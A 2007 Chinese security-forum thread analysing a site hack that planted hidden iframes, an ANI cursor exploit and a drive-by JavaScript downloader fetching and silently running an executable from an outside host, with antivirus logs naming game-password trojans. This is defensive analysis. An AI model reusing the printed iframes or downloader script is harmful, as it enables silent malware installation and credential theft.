天网主页被挂马

wwtd

http://pfw.sky.net.cn/
抓了几个


[ 本帖最后由 wwtd 于 2007-10-30 07:03 编辑 ]

无敌敏敏

Starting the file scan:

Begin scan in 'E:\104.rar'
E:\104.rar
  [0] Archive type: RAR
  --> 104.htm
      [DETECTION] Contains suspicious code HEUR/Exploit.HTML
      [INFO]      The file was deleted!

a256886572008

<iframe src=http://www.smsunionmm.com/104/ width=100 height=0 frameborder=0></iframe>  

<html><TITLE>index</TITLE><BODY>
<iframe src=http://www.smsunionmm.com/104/111/001.htm width=50 height=0></iframe>
<iframe src=http://www.smsunionmm.com/104/222/002.htm width=0 height=0></iframe>
<iframe src=http://www.smsunionmm.com/104/333/003.htm width=0 height=0></iframe>
<iframe src=http://www.smsunionmm.com/104/xl/ok.asp width=0 height=0></iframe>
</body></html>
<script src='http://s109.cnzz.com/stat.php?id=418430&web_id=418430' language='JavaScript' charset='gb2312'></script>

http://www.smsunionmm.com/104/111/001.htm

<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=big5">
<META content="MSHTML 6.00.2900.3059" name=GENERATOR></HEAD>
<BODY>
<DIV style="CURSOR: url('http://www.smsunionmm.com/104/111/1.jpg')"></DIV>
</BODY></HTML>

http://www.smsunionmm.com/104/111/1.jpg

RIFF  ACONanih$   $                                   
   TSIL       TSIL   anihR   01230123012301230123012301230123 444444444444444444444444444                    ?鹏d?0   坝?:
劳   ?
輠
  h   j 邿   胧?^韝剒??W?
  胧3囗3幫韜糪餍_鏑?  [睷
  镂>?cmd >せ/c "亩3霏Ph
  RSP?
  ????>?厩t@錂> "3?莲
伟T3???鬞}        >?
狭錓镝难砥3?ぜ,
   QSPPPPPPWP頩   ?   栾 ?8Ut厰??tU鹏变跠on  hurlm?铄$P?P閬   輲鴇秪懵lhntdl?铄$P?P?   諟鴇秪懷32  huser?铄$P鳼?P醅   ?鴇秪鏡_   h?P鋠   秪鏡K   h阿
|P鋙   秪鏡7   hr¼P遧   秪鏡MhO餳P?   秪鏡   h蛱雔?   秪?駱谨0块x>谨>宠?谨鏃>谨4狭|>谨<嚥6鹅$$6迹<6镉x?迩>双 楯;I>???3瞪?龜蹋
齴?;|$(u?双$慉>?K>双????碛$a鏡?http://www.smsunionmm.com/104/1.exe 2

http://www.smsunionmm.com/104/222/002.htm

<html><head>
<script language =javascript>
function gn(n)
{var number = Math.random()*n;return '~tmp'+Math.round(number)+'.exe';}
try{
dl='http://www.smsunionmm.com/104/1.exe';
var df=document.createElement("object");
df.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var x=df.CreateObject("Microsoft.X"+"M"+"L"+"H"+"T"+"T"+"P","");
var S=df.CreateObject("Adodb.Stream","");
S.type=1; x.open("GET", dl,0); x.send(); fname1=gn(10000);
var F=df.CreateObject("Scripting.FileSystemObject","");
var tmp=F.GetSpecialFolder(0);
fname1= F.BuildPath(tmp,fname1);
S.Open(); S.Write(x.responseBody); S.SaveToFile(fname1,2); S.Close();
var Q=df.CreateObject("Shell.Application","");
Q.ShellExecute(fname1,"","","open",0); }
catch(i)
{i=1;}
</script></head></html>

[ 本帖最后由 a256886572008 于 2007-10-30 07:35 编辑 ]

无敌敏敏

原帖由 a256886572008 于 2007-10-30 07:31 发表
  



http://www.smsunionmm.com/104/111/001.htm


http://www.smsunionmm.com/104/111/1.jpg


http://www.smsunionmm.com/104/222/002.htm

Starting the file scan:
Begin scan in 'E:\1.rar'
E:\1.rar
  [0] Archive type: RAR
  --> 1.exe
      [DETECTION] Is the Trojan horse TR/Dldr.Zhidao
      [INFO]      The file was deleted!

a256886572008

下載了一堆

无敌敏敏

网游木马~

Starting the file scan:

Begin scan in 'E:\down.rar'
E:\down.rar
  [0] Archive type: RAR
  --> dahua.exe
      [DETECTION] Is the Trojan horse TR/PSW.Onlineg.ZX.1
  --> dahua3.exe
      [DETECTION] Is the Trojan horse TR/Dropper.Gen
  --> daojian.exe
      [DETECTION] Is the Trojan horse TR/Agent.19544.4
  --> fengyun.exe
      [DETECTION] Is the Trojan horse TR/Agent.19044
  --> guangzhi.exe
      [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.fra
  --> huaxia.exe
      [DETECTION] Is the Trojan horse TR/Dropper.Gen
  --> jianghu.exe
      [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.gfi
  --> jianxia.exe
      [DETECTION] Is the Trojan horse TR/FWDisable.22112.1
  --> menghuan1.exe
      [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.giv
  --> moyu.exe
      [DETECTION] Is the Trojan horse TR/Dropper.Gen
  --> ms.exe
      [DETECTION] Is the Trojan horse TR/PSW.Wow.acd
  --> potian.exe
      [DETECTION] Is the Trojan horse TR/Dropper.Gen
  --> qiji.exe
      [DETECTION] Is the Trojan horse TR/Dropper.Gen
  --> tianlong.exe
      [DETECTION] Is the Trojan horse TR/Agent.19528
  --> wanmei.exe
      [DETECTION] Contains suspicious code HEUR/Malware
  --> wendao.exe
      [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.gew
  --> wulin.exe
      [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.gie
  --> zhengtu.exe
      [DETECTION] Is the Trojan horse TR/Spy.Gen
  --> zhuxian.exe
      [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.giz
  --> menghuan.exe
      [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.giv
  --> internat.exe
      [DETECTION] Is the Trojan horse TR/Dldr.Zhidao
      [INFO]      The file was deleted!

[ 本帖最后由 无敌敏敏 于 2007-10-30 08:06 编辑 ]

xqiafl

真是讽刺,安全站被挂马.


不过, 这个站www.smsunionmm.com/  已经被我屏蔽掉了!!

60KB的HOSTS 文件!!

wangjay1980

detected: malware Exploit.Win32.IMG-ANI.k      .kafan.cn/attachment.php?aid=146293//1.jpg
detected: Trojan program Trojan-Downloader.Win32.Agent.buv        URL: http://bbs.kafan.cn/attachment.php?aid=146295//1.exe//UPack
detected: Trojan program Trojan-PSW.Win32.OnLineGames.ggc        File: C:\Documents and Settings\Owner\×&Agrave;&Atilde;&aelig;\down.rar/dahua.exe//PE_Patch//UPack
detected: Trojan program Trojan-PSW.Win32.OnLineGames.fyp        File: C:\Documents and Settings\Owner\×&Agrave;&Atilde;&aelig;\down.rar/daojian.exe//UPack
detected: Trojan program Trojan-PSW.Win32.OnLineGames.gjt        File: C:\Documents and Settings\Owner\×&Agrave;&Atilde;&aelig;\down.rar/fengyun.exe//UPack
detected: Trojan program Trojan-PSW.Win32.OnLineGames.fra        File: C:\Documents and Settings\Owner\×&Agrave;&Atilde;&aelig;\down.rar/guangzhi.exe//UPack
detected: Trojan program Trojan-PSW.Win32.OnLineGames.gfd        File: C:\Documents and Settings\Owner\×&Agrave;&Atilde;&aelig;\down.rar/jianghu.exe//UPack
detected: Trojan program Trojan-PSW.Win32.OnLineGames.giv        File: C:\Documents and Settings\Owner\×&Agrave;&Atilde;&aelig;\down.rar/menghuan1.exe//UPack
detected: Trojan program Trojan-PSW.Win32.OnLineGames.gjs        File: C:\Documents and Settings\Owner\×&Agrave;&Atilde;&aelig;\down.rar/ms.exe//PE_Patch//UPack
detected: Trojan program Trojan-PSW.Win32.OnLineGames.gkc        File: C:\Documents and Settings\Owner\×&Agrave;&Atilde;&aelig;\down.rar/qiji.exe//UPack
detected: Trojan program Trojan-PSW.Win32.OnLineGames.fyp        File: C:\Documents and Settings\Owner\×&Agrave;&Atilde;&aelig;\down.rar/tianlong.exe//UPack
detected: Trojan program Trojan-PSW.Win32.OnLineGames.gjr        File: C:\Documents and Settings\Owner\×&Agrave;&Atilde;&aelig;\down.rar/wanmei.exe//PE_Patch//UPack
detected: Trojan program Trojan-PSW.Win32.OnLineGames.fyp        File: C:\Documents and Settings\Owner\×&Agrave;&Atilde;&aelig;\down.rar/wendao.exe//UPack
detected: Trojan program Trojan-PSW.Win32.OnLineGames.gih        File: C:\Documents and Settings\Owner\×&Agrave;&Atilde;&aelig;\down.rar/wulin.exe//UPack
detected: Trojan program Trojan-PSW.Win32.OnLineGames.giv        File: C:\Documents and Settings\Owner\×&Agrave;&Atilde;&aelig;\down.rar/zhuxian.exe//UPack
detected: Trojan program Trojan-PSW.Win32.OnLineGames.giv        File: C:\Documents and Settings\Owner\×&Agrave;&Atilde;&aelig;\down.rar/menghuan.exe//UPack
detected: Trojan program Trojan-Downloader.Win32.Agent.buv        File: C:\Documents and Settings\Owner\×&Agrave;&Atilde;&aelig;\down.rar/internat.exe//UPack

clock11011

kv2008：

yclidong

扫描进行于：2007-10-30 12:45:28
扫描日志
NOD32版本 2626 (20071030) NT
命令行： C:\Documents and Settings\Administrator\桌面\1.rar

日期： 30.10.2007  时间：12:45:30
已开启反隐藏功能.
已扫描的磁盘，文件夹及文件：C:\Documents and Settings\Administrator\桌面\1.rar
C:\Documents and Settings\Administrator\桌面\1.rar >>RAR >>1.jpg - Win32/TrojanDownloader.Ani.Gen 木马的变种
已扫描的文件数目：3
已发现的病毒数目：1
完成时间： 12:45:30 总扫描时间：0 秒 (00:00:00)